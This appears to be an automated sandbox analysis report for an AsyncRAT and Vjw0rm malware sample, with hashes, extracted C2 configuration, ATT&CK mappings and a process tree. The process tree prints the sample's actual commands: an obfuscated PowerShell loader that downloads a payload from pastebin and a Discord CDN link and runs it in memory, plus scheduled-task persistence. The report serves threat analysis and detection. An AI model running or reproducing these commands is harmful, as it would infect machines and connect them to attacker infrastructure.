asyncrat | 08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a

General

Target

C28B393FCCF6D23F9B175B44C4288893.exe
Size

669KB
MD5

c28b393fccf6d23f9b175b44c4288893
SHA1

7d081db02f6654c785fca5b8187e13fdde5878c6
SHA256

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a
SHA512

e9167c23388fe417a1da2733272a40052ca5db5f1068e57bfcf0864e129e7e9a5aab43d10647e6bdc2b84eb66f7ab0f1677e268f5581931b8a147cf74330fc3b
SSDEEP

12288:SBdlwHRn+WlYV+W2X+t4DwlFpJu0nTXoJwh7mA9St4xjXLYqEWXP+YjjPGoTI:SBkVdlYAW0MlFPnEJwB9SojIFkjPGR

Score

10^/10

asyncrat vjw0rm suepr envio sep03 discovery execution persistence rat trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://pastebin.com/raw/V9y5Q5vv

Extracted

Family

asyncrat

Version

1.0.7

Botnet

SUEPR ENVIO SEP03

C2

nyan43.duckdns.org:1963

Mutex

YHGBVFDC

Attributes

delay
15
install
false
install_file
qawsedrftyujgh.exe
install_folder
%AppData%

aes.plain

Extracted

Family

vjw0rm

C2

http://yuya0415.duckdns.org:1928

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 23 IoCs

Processes:

powershell.exeWScript.exe

flow	pid	process
6	788	powershell.exe
7	788	powershell.exe
9	788	powershell.exe
10	788	powershell.exe
11	2632	WScript.exe
12	2632	WScript.exe
14	2632	WScript.exe
17	2632	WScript.exe
19	2632	WScript.exe
21	2632	WScript.exe
25	2632	WScript.exe
26	2632	WScript.exe
29	2632	WScript.exe
32	2632	WScript.exe
34	2632	WScript.exe
36	2632	WScript.exe
39	2632	WScript.exe
42	2632	WScript.exe
45	2632	WScript.exe
47	2632	WScript.exe
49	2632	WScript.exe
51	2632	WScript.exe
54	2632	WScript.exe

Executes dropped EXE 3 IoCs

Processes:

DOCUMENTOS.exe.......exe.......exe

pid process

2740 DOCUMENTOS.exe
2636 .......exe
2076 .......exe
Loads dropped DLL 3 IoCs

Processes:

cmd.exeDOCUMENTOS.exe.......exe

pid process

2860 cmd.exe
2740 DOCUMENTOS.exe
2636 .......exe

pid	process
2740	DOCUMENTOS.exe
2636	.......exe
2076	.......exe

pid	process
2860	cmd.exe
2740	DOCUMENTOS.exe
2636	.......exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\ZL320VW7T1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\..............js\""	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1224 powershell.exe
788 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

5 pastebin.com
7 pastebin.com
8 bitbucket.org
9 bitbucket.org
10 bitbucket.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

.......exe

description pid process target process

PID 2636 set thread context of 2076 2636 .......exe .......exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1224	powershell.exe
788	powershell.exe

flow	ioc
5	pastebin.com
7	pastebin.com
8	bitbucket.org
9	bitbucket.org
10	bitbucket.org

description	pid	process	target process
PID 2636 set thread context of 2076	2636	.......exe	.......exe

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.exe.......exeschtasks.exeC28B393FCCF6D23F9B175B44C4288893.execmd.exeDOCUMENTOS.exeWScript.exeschtasks.exepowershell.exe.......exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.......exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C28B393FCCF6D23F9B175B44C4288893.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOCUMENTOS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.......exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2976 schtasks.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1224 powershell.exe
788 powershell.exe

pid	process
2976	schtasks.exe

pid	process
1224	powershell.exe
788	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

.......exepowershell.exepowershell.exe.......exe

description	pid	process
Token: SeDebugPrivilege	2636	.......exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeDebugPrivilege	2076	.......exe
Token: SeDebugPrivilege	2076	.......exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

C28B393FCCF6D23F9B175B44C4288893.execmd.exeDOCUMENTOS.exeWScript.exe.......exepowershell.exe

description	pid	process	target process
PID 2408 wrote to memory of 2860	2408	C28B393FCCF6D23F9B175B44C4288893.exe	cmd.exe
PID 2408 wrote to memory of 2860	2408	C28B393FCCF6D23F9B175B44C4288893.exe	cmd.exe
PID 2408 wrote to memory of 2860	2408	C28B393FCCF6D23F9B175B44C4288893.exe	cmd.exe
PID 2408 wrote to memory of 2860	2408	C28B393FCCF6D23F9B175B44C4288893.exe	cmd.exe
PID 2860 wrote to memory of 2740	2860	cmd.exe	DOCUMENTOS.exe
PID 2860 wrote to memory of 2740	2860	cmd.exe	DOCUMENTOS.exe
PID 2860 wrote to memory of 2740	2860	cmd.exe	DOCUMENTOS.exe
PID 2860 wrote to memory of 2740	2860	cmd.exe	DOCUMENTOS.exe
PID 2740 wrote to memory of 2632	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2632	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2632	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2632	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2576	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2576	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2576	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2576	2740	DOCUMENTOS.exe	WScript.exe
PID 2740 wrote to memory of 2636	2740	DOCUMENTOS.exe	.......exe
PID 2740 wrote to memory of 2636	2740	DOCUMENTOS.exe	.......exe
PID 2740 wrote to memory of 2636	2740	DOCUMENTOS.exe	.......exe
PID 2740 wrote to memory of 2636	2740	DOCUMENTOS.exe	.......exe
PID 2576 wrote to memory of 2388	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2388	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2388	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2388	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2976	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2976	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2976	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 2976	2576	WScript.exe	schtasks.exe
PID 2576 wrote to memory of 1224	2576	WScript.exe	powershell.exe
PID 2576 wrote to memory of 1224	2576	WScript.exe	powershell.exe
PID 2576 wrote to memory of 1224	2576	WScript.exe	powershell.exe
PID 2576 wrote to memory of 1224	2576	WScript.exe	powershell.exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 2636 wrote to memory of 2076	2636	.......exe	.......exe
PID 1224 wrote to memory of 788	1224	powershell.exe	powershell.exe
PID 1224 wrote to memory of 788	1224	powershell.exe	powershell.exe
PID 1224 wrote to memory of 788	1224	powershell.exe	powershell.exe
PID 1224 wrote to memory of 788	1224	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\C28B393FCCF6D23F9B175B44C4288893.exe
"C:\Users\Admin\AppData\Local\Temp\C28B393FCCF6D23F9B175B44C4288893.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\DOCC..bat" "
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Users\Admin\AppData\Local\Temp\DOCUMENTOS.exe
    DOCUMENTOS.exe -pA2024 -dC:\Users\Admin\AppData\Local\Temp
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\..............js"
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2632
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\..........vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2576
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2388
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼Bq☼HY☼bgBl☼HU☼I☼☼9☼C☼☼Jw☼w☼DE☼Jw☼7☼CQ☼bwB6☼HM☼agBm☼C☼☼PQ☼g☼Cc☼JQBw☼Ho☼QQBj☼E8☼ZwBJ☼G4☼TQBy☼CU☼Jw☼7☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBy☼HY☼aQBj☼GU☼U☼Bv☼Gk☼bgB0☼E0☼YQBu☼GE☼ZwBl☼HI☼XQ☼6☼Do☼UwBl☼HI☼dgBl☼HI☼QwBl☼HI☼d☼Bp☼GY☼aQBj☼GE☼d☼Bl☼FY☼YQBs☼Gk☼Z☼Bh☼HQ☼aQBv☼G4☼QwBh☼Gw☼b☼Bi☼GE☼YwBr☼C☼☼PQ☼g☼Hs☼J☼B0☼HI☼dQBl☼H0☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼I☼☼9☼C☼☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼GM☼dQBy☼Gk☼d☼B5☼F☼☼cgBv☼HQ☼bwBj☼G8☼b☼BU☼Hk☼c☼Bl☼F0☼Og☼6☼FQ☼b☼Bz☼DE☼Mg☼7☼Fs☼QgB5☼HQ☼ZQBb☼F0☼XQ☼g☼CQ☼dQBo☼G0☼eQB6☼C☼☼PQ☼g☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBD☼G8☼bgB2☼GU☼cgB0☼F0☼Og☼6☼EY☼cgBv☼G0☼QgBh☼HM☼ZQ☼2☼DQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼C☼☼K☼BO☼GU☼dw☼t☼E8☼YgBq☼GU☼YwB0☼C☼☼TgBl☼HQ☼LgBX☼GU☼YgBD☼Gw☼aQBl☼G4☼d☼☼p☼C4☼R☼Bv☼Hc☼bgBs☼G8☼YQBk☼FM☼d☼By☼Gk☼bgBn☼Cg☼JwBo☼HQ☼d☼Bw☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼HU☼a☼Bt☼Hk☼eg☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼CY☼Nw☼5☼DU☼Nw☼3☼D☼☼NgBm☼Dg☼N☼Bm☼Dk☼M☼Bj☼Dk☼Nw☼2☼Dc☼NQ☼5☼DM☼O☼Bj☼GU☼MwBi☼GQ☼NgBj☼GE☼N☼Bj☼DY☼MwBi☼DE☼ZgBj☼DY☼Nw☼5☼DM☼Z☼Bj☼DM☼YQ☼1☼GE☼MgBi☼GI☼Mw☼x☼GM☼MwBi☼DQ☼Z☼Bh☼DY☼MQBk☼GM☼Zg☼9☼G0☼a☼☼m☼DU☼MQ☼y☼DQ☼NwBk☼DY☼Ng☼9☼HM☼aQ☼m☼DU☼OQ☼z☼Dk☼O☼Bk☼DY☼Ng☼9☼Hg☼ZQ☼/☼HQ☼e☼B0☼C4☼Mw☼0☼E4☼QQBZ☼Ek☼TgBD☼EQ☼Lw☼4☼Dg☼N☼☼1☼Dc☼MQ☼y☼Dg☼O☼☼z☼DU☼Ng☼0☼Dc☼NQ☼w☼Dg☼Mg☼x☼C8☼Mw☼1☼DE☼MQ☼z☼DE☼NQ☼4☼DE☼Mg☼3☼DY☼MQ☼5☼DE☼M☼☼4☼DI☼MQ☼v☼HM☼d☼Bu☼GU☼bQBo☼GM☼YQB0☼HQ☼YQ☼v☼G0☼bwBj☼C4☼c☼Bw☼GE☼Z☼By☼G8☼YwBz☼Gk☼Z☼☼u☼G4☼Z☼Bj☼C8☼Lw☼6☼HM☼c☼B0☼HQ☼a☼☼n☼C☼☼L☼☼g☼CQ☼bwB6☼HM☼agBm☼C☼☼L☼☼g☼Cc☼XwBf☼F8☼XwBf☼F8☼R☼BD☼E4☼SQBZ☼EE☼TgBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼C0☼LQ☼t☼C0☼LQ☼t☼C0☼Jw☼s☼C☼☼J☼Bq☼HY☼bgBl☼HU☼L☼☼g☼Cc☼MQ☼n☼Cw☼I☼☼n☼FI☼bwBk☼GE☼Jw☼g☼Ck☼KQ☼7☼☼==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\..........vbs');powershell -command $KByHL;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1224
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jvneu = '01';$ozsjf = 'C:\Users\Admin\AppData\Local\Temp\..........vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $uhmyz = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($uhmyz).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&7957706f84f90c97675938ce3bd6ca4c63b1fc6793dc3a5a2bb31c3b4da61dcf=mh&51247d66=si&59398d66=xe?txt.34NAYINCD/8845712883564750821/3511315812761910821/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $ozsjf , '______DCNIYAN_____________________________________-------', $jvneu, '1', 'Roda' ));"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:788
  - - C:\Users\Admin\AppData\Local\Temp\.......exe
      "C:\Users\Admin\AppData\Local\Temp\.......exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2636
    - - C:\Users\Admin\AppData\Local\Temp\.......exe
        
        "C:\Users\Admin\AppData\Local\Temp\.......exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\..............js

Filesize
19KB

MD5
1e2d967510acc2d7eafe89a5e7065d22

SHA1
a4a48ef24001200fbe87192a235a1e1b93503ed9

SHA256
d65a679961d19a6b4019bf4b236358376512776779c6ef553afb1a82066ae5b5

SHA512
729d0d2216c30d7ad3dd6ee9e0853a7e61baab23f5013aa93c7c64707718eef3353c97de3dc32133a03389ffb5c42334620644520ff90ccaa7a7e1639414955d

Download Submit
C:\Users\Admin\AppData\Local\Temp\..........vbs

Filesize
11.1MB

MD5
52f3268631d8e587ca16d620fa730ca4

SHA1
9d2fd3dfc0b55a052d9b9f38e12f353e266b5283

SHA256
89e19321c824beee9a59f3099287709c97ff2741601d87575ecae823b72330fe

SHA512
cb2c2c871d17c4d86137ce986754fa99beabf7844b601abd6dcd95e8cd44cec5c9233699aa84d1ea05473de593295f6fb6256446e85e9dde7e140b0942138e99

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCC..bat

Filesize
31B

MD5
dbc43c69d0db1281d4980239473e6878

SHA1
1e1c00319ec2d094d7b4b7f20a06fe33ef3f3505

SHA256
f6139a5b45f9d856e978740acb52bd00e38dd963006293f05b7f279f61dce123

SHA512
a814be51d049b6080a69fd3c178143cc4624d3eccb8c415813d177d377975c907383c3a08c98b815211f9af50ecf246875072ad548ebfa63341dd6a68d4925a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCUMENTOS.exe

Filesize
496KB

MD5
92bc72b4a0421640775050aebb624629

SHA1
cbe83c0360e84f816e70c9a63ef82e6437b0a97b

SHA256
d33377b73ab3ab2b13508d9e4c293cc45b63bb2cb94297d39822f71e66a20d36

SHA512
3c1d6e9b0a81b288b04d614a3997236a7a5af538015cb7caa159daa409f35cccfb149a9adfd9314856e43a7f0f3237a43d16177299ff2f7d8b5c34e7659a5064

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a98dde00776e64743123edd012ddff36

SHA1
3277a53ce7704dd9b4d27fd05588463c000898e6

SHA256
9da1910aa67454dc61d5d4cfea021f23cb9a2cb328fbe09ace7040f7ef4475f7

SHA512
24770dbf05d69f5f91d353286759b66ccc73964393d450651e6dbaba8a753bca4f471797e73e7ce45f323593d0f29f1c532ee0d93af867bbe573cbf1174b1f8e

Download Submit
\Users\Admin\AppData\Local\Temp\.......exe

Filesize
168KB

MD5
f1519c55864faaee2b9c5d1fe108c161

SHA1
6c52b209f54224c968c3c97697760a41687b6d94

SHA256
0061e8f7d0c9996657cf12c53bd07b3c803b209fc20dbfb085c96f6a3e34fa80

SHA512
36994b04e89b39590a5ed699bc8a66ae28db20f4fffbdf1c2e9a3123660d8d10711ef4b7cc0d3b4d80e871a3b83372a4a88b2a1546f51d835af9cf5084859cac

Download Submit
memory/2076-58-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2076-56-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2076-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2076-53-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2076-51-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2076-49-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2076-47-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2076-60-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2636-45-0x0000000000980000-0x000000000098A000-memory.dmp

Filesize
40KB

Download
memory/2636-42-0x0000000000350000-0x000000000037A000-memory.dmp

Filesize
168KB

Download
memory/2636-40-0x0000000000B00000-0x0000000000B30000-memory.dmp

Filesize
192KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads